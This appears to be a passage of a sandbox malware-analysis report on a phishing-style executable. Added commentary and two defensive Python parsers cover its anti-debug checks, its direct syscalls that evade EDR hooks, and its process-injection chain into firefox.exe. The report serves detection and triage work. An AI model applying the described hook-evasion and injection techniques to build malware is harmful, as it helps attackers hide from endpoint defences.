                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030309AD mov eax, dword ptr fs:[00000030h]4_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030309AD mov eax, dword ptr fs:[00000030h]4_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B89B3 mov esi, dword ptr fs:[00000030h]4_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B89B3 mov eax, dword ptr fs:[00000030h]4_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B89B3 mov eax, dword ptr fs:[00000030h]4_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C69C0 mov eax, dword ptr fs:[00000030h]4_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030649D0 mov eax, dword ptr fs:[00000030h]4_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FA9D3 mov eax, dword ptr fs:[00000030h]4_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BE9E0 mov eax, dword ptr fs:[00000030h]4_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030629F9 mov eax, dword ptr fs:[00000030h]4_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030629F9 mov eax, dword ptr fs:[00000030h]4_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BC810 mov eax, dword ptr fs:[00000030h]4_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov ecx, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A830 mov eax, dword ptr fs:[00000030h]4_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D483A mov eax, dword ptr fs:[00000030h]4_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D483A mov eax, dword ptr fs:[00000030h]4_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03042840 mov ecx, dword ptr fs:[00000030h]4_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03060854 mov eax, dword ptr fs:[00000030h]4_2_03060854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034859 mov eax, dword ptr fs:[00000030h]4_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034859 mov eax, dword ptr fs:[00000030h]4_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BE872 mov eax, dword ptr fs:[00000030h]4_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BE872 mov eax, dword ptr fs:[00000030h]4_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C6870 mov eax, dword ptr fs:[00000030h]4_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C6870 mov eax, dword ptr fs:[00000030h]4_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030887 mov eax, dword ptr fs:[00000030h]4_2_03030887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BC89D mov eax, dword ptr fs:[00000030h]4_2_030BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E8C0 mov eax, dword ptr fs:[00000030h]4_2_0305E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FA8E4 mov eax, dword ptr fs:[00000030h]4_2_030FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C8F9 mov eax, dword ptr fs:[00000030h]4_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C8F9 mov eax, dword ptr fs:[00000030h]4_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E6F00 mov eax, dword ptr fs:[00000030h]4_2_030E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03032F12 mov eax, dword ptr fs:[00000030h]4_2_03032F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CF1F mov eax, dword ptr fs:[00000030h]4_2_0306CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305EF28 mov eax, dword ptr fs:[00000030h]4_2_0305EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B4F40 mov eax, dword ptr fs:[00000030h]4_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B4F40 mov eax, dword ptr fs:[00000030h]4_2_030B4F40
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00E580A9
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E2A155
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E2A124 SetUnhandledExceptionFilter,0_2_00E2A124
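In 32-bit code `fs:[30h]` is the PEB pointer held in the TEB, so every row above is the injected code fetching the PEB. What matters for triage is what is read next: `BeingDebugged` at +0x02 and `NtGlobalFlag` at +0x68 are debugger checks, while `Ldr` at +0x0C is the start of manual import resolution. The scanner below is an added example written for this page, not code from Joe Sandbox or from the sample; it matches both encodings of the instruction in a raw code buffer and classifies the follow-up dereference. The input bytes are constructed for the example, and the field table assumes the 32-bit PEB layout and the usual "load PEB, then read [reg+disp8]" idiom.

```python
"""Scan 32-bit x86 code for reads of the PEB through fs:[30h] and classify
which PEB field the following instruction touches."""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# `mov r32, dword ptr fs:[00000030h]` has two encodings:
#   64 A1 30 00 00 00        mov eax, fs:[30h]   (moffs32 short form, eax only)
#   64 8B /r 30 00 00 00     mov r32, fs:[30h]   (ModRM mod=00 rm=101 = disp32)
_PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00"
)

# PEB fields commonly dereferenced right after the load (32-bit layout; assumption).
PEB_FIELDS: Dict[int, str] = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}

# Opcodes of the usual follow-up instruction, each followed by a ModRM byte:
# mov r32,[r+d8] / mov r8,[r+d8] / movzx r32,byte [r+d8] / cmp byte [r+d8],imm8
_DEREF_OPCODES = (b"\x8b", b"\x8a", b"\x0f\xb6", b"\x80")


def _field_offset_after(code: bytes, pos: int, reg: int) -> Optional[int]:
    """If the instruction at `pos` reads [reg + disp8], return disp8, else None."""
    for opc in _DEREF_OPCODES:
        if code.startswith(opc, pos) and len(code) > pos + len(opc) + 1:
            modrm = code[pos + len(opc)]
            if (modrm >> 6) == 1 and (modrm & 7) == reg:   # mod=01, rm=reg
                return code[pos + len(opc) + 1]
    return None


def find_peb_reads(code: bytes) -> List[Tuple[int, str, str]]:
    """Return (offset, destination register, PEB field) for each fs:[30h] read."""
    hits = []
    for m in _PEB_READ.finditer(code):
        enc = m.group(0)
        reg = 0 if enc[1] == 0xA1 else (enc[2] >> 3) & 7   # reg field of ModRM
        off = _field_offset_after(code, m.end(), reg)
        field = "unknown" if off is None else PEB_FIELDS.get(off, f"PEB+0x{off:02x}")
        hits.append((m.start(), REG32[reg], field))
    return hits


def summarize(code: bytes) -> Dict[str, int]:
    """Count reads per PEB field, the bucketing a sandbox verdict is built from."""
    return dict(Counter(field for _, _, field in find_peb_reads(code)))


# Constructed sample (not from the report): three PEB reads as a 32-bit
# anti-debug / API-resolution prologue would emit them.
SAMPLE = (
    b"\x55\x8b\xec"                    # push ebp ; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"        # mov eax, fs:[30h]
    b"\x0f\xb6\x40\x02"                # movzx eax, byte ptr [eax+2]  -> BeingDebugged
    b"\x85\xc0"                        # test eax, eax
    b"\x64\x8b\x15\x30\x00\x00\x00"    # mov edx, fs:[30h]
    b"\x8b\x42\x68"                    # mov eax, [edx+68h]           -> NtGlobalFlag
    b"\x64\x8b\x35\x30\x00\x00\x00"    # mov esi, fs:[30h]
    b"\x8b\x76\x0c"                    # mov esi, [esi+0Ch]           -> Ldr
    b"\xc3"                            # ret
)

if __name__ == "__main__":
    for offset, reg, field in find_peb_reads(SAMPLE):
        print(f"+0x{offset:04x}: mov {reg}, fs:[30h]  ->  {field}")
```

Run it over an unpacked region (for instance the `4.2.svchost.exe.*.unpack` dumps this report lists) to turn the flat row list above into a per-field count; a function that only ever follows the read with `+0x0C` is resolving imports, not looking for a debugger.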

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtOpenFile: Direct from: 0x77382DCC
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | NtProtectVirtualMemory: Direct from: 0x77377B2E
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: NULL target: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe protection: read write
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: NULL target: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\comp.exe | Thread register set: target process: 8084
                Source: C:\Windows\SysWOW64\comp.exe | Thread APC queued: target process: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2408008
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E587B1 LogonUserW
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E64C7F mouse_event
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATON-37839993.exe"
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe | Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
                Source: C:\Windows\SysWOW64\comp.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
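The "Direct from" rows are Nt* system calls the sandbox attributes to a direct or indirect syscall rather than to the normal ntdll stub, which is the stub that user-mode EDR hooks patch; the "Section loaded", "Memory written", "Thread APC queued" and "Process created" rows, taken together, are the injection chain from the dropped sample through svchost.exe and comp.exe into firefox.exe. The script below is an added example for this page, not Joe Sandbox code: it parses rows in the raw export form shown here, tallies direct syscalls per process and rebuilds the process-to-process injection graph. The sample rows are copied from this report; the tolerance for a " | " column separator and for the trailing "Jump to behavior" link text is an assumption about how the export is flattened.

```python
"""Parse Joe Sandbox 'Source: ...' finding rows and summarise (a) direct
syscalls per process and (b) which process injected into which."""
import re
from collections import Counter
from typing import Iterable, List, Set, Tuple

# One exported row: "Source: <path.exe><finding>", optionally followed by the
# page's "Jump to behavior" link text.  A " | " between the source path and
# the finding is tolerated (assumption about alternative export layouts).
_ROW = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*(?:\|\s*)?(?P<rest>.*?)\s*(?:Jump to behavior)?$"
)
_SYSCALL = re.compile(r"^(Nt\w+): Direct from: (0x[0-9A-Fa-f]+)$")
_SECTION = re.compile(r"^Section loaded: NULL target: (.+?) protection: (.+)$")
_WRITTEN = re.compile(r"^Memory written: (.+?\.exe) base: (\w+)$")
_APC = re.compile(r"^Thread APC queued: target process: (.+)$")
_CREATED = re.compile(r'^Process created: (.+?\.exe) "')

Edge = Tuple[str, str, str]   # (injecting process, target process, technique)


def basename(path: str) -> str:
    """Last component of a Windows path (os.path will not split on '\\' off-Windows)."""
    return path.rstrip("\\").rsplit("\\", 1)[-1]


def parse_rows(rows: Iterable[str]) -> Tuple[Counter, List[Edge]]:
    syscalls: Counter = Counter()   # (process, Nt* name) -> number of direct calls
    edges: List[Edge] = []
    for row in rows:
        m = _ROW.match(row.strip())
        if not m:
            continue
        src, rest = basename(m["src"]), m["rest"]
        if (s := _SYSCALL.match(rest)):
            syscalls[(src, s.group(1))] += 1
        elif (s := _SECTION.match(rest)):
            edges.append((src, basename(s.group(1)), "section mapped, " + s.group(2)))
        elif (s := _WRITTEN.match(rest)):
            edges.append((src, basename(s.group(1)), "memory written at base " + s.group(2)))
        elif (s := _APC.match(rest)):
            edges.append((src, basename(s.group(1)), "APC queued"))
        elif (s := _CREATED.match(rest)):
            edges.append((src, basename(s.group(1)), "process created"))
    return syscalls, edges


def injection_chain(edges: List[Edge], root: str) -> List[str]:
    """Breadth-first walk from `root`; the order processes are reached in is
    the order the chain was built."""
    seen, order, queue = {root}, [root], [root]
    while queue:
        cur = queue.pop(0)
        for s, t, _ in edges:
            if s == cur and t not in seen:
                seen.add(t)
                order.append(t)
                queue.append(t)
    return order


def rwx_targets(edges: List[Edge]) -> Set[str]:
    """Processes that received an executable section from another process."""
    return {t for _, t, tech in edges if "execute" in tech}


# Rows copied from this report, in the raw (column-fused) export form.
DROPPED_EXE = (r"C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG"
               r"\FOBNeEFwBsF.exe")
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\QUOTATON-37839993.exeProcess created: C:\Windows\SysWOW64\svchost.exe "
    r'"C:\Users\user\Desktop\QUOTATON-37839993.exe"Jump to behavior',
    r"Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: NULL target: "
    r"C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeSection loaded: NULL target: " + DROPPED_EXE
    + " protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: "
    r"C:\Windows\SysWOW64\comp.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: "
    r"C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior",
    "Source: C:\\Windows\\SysWOW64\\comp.exeThread APC queued: target process: " + DROPPED_EXE
    + "Jump to behavior",
    "Source: " + DROPPED_EXE + "NtResumeThread: Direct from: 0x773836ACJump to behavior",
    "Source: " + DROPPED_EXE + "NtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior",
    "Source: " + DROPPED_EXE + "NtResumeThread: Direct from: 0x77382FBCJump to behavior",
    "Source: " + DROPPED_EXE + "NtClose: Direct from: 0x77382B6C",
]

if __name__ == "__main__":
    calls, graph = parse_rows(SAMPLE_ROWS)
    print(" -> ".join(injection_chain(graph, "QUOTATON-37839993.exe")))
    for (proc, name), n in sorted(calls.items()):
        print(f"{proc}: {name} x{n}")
```

Feeding the full row set above through `parse_rows` gives the complete inventory; the pairing of `NtWriteVirtualMemory`, `NtProtectVirtualMemory`, `NtMapViewOfSection` and `NtResumeThread` among the direct calls is the injection primitive set, issued in a way that sidesteps hooks on the corresponding ntdll exports.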
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: QUOTATON-37839993.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: FOBNeEFwBsF.exe, 0000000C.00000000.2513686077.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4008099962.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4008754897.00000000010F1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
                Source: QUOTATON-37839993.exe, FOBNeEFwBsF.exe, 0000000C.00000000.2513686077.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4008099962.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4008754897.00000000010F1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: FOBNeEFwBsF.exe, 0000000C.00000000.2513686077.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4008099962.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4008754897.00000000010F1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: FOBNeEFwBsF.exe, 0000000C.00000000.2513686077.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4008099962.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4008754897.00000000010F1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E2862B cpuid
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E41E06 GetUserNameW
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

Source: Yara match | File source: 4.2.svchost.exe.2640000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.2640000.0.raw.unpack, type: UNPACKEDPE
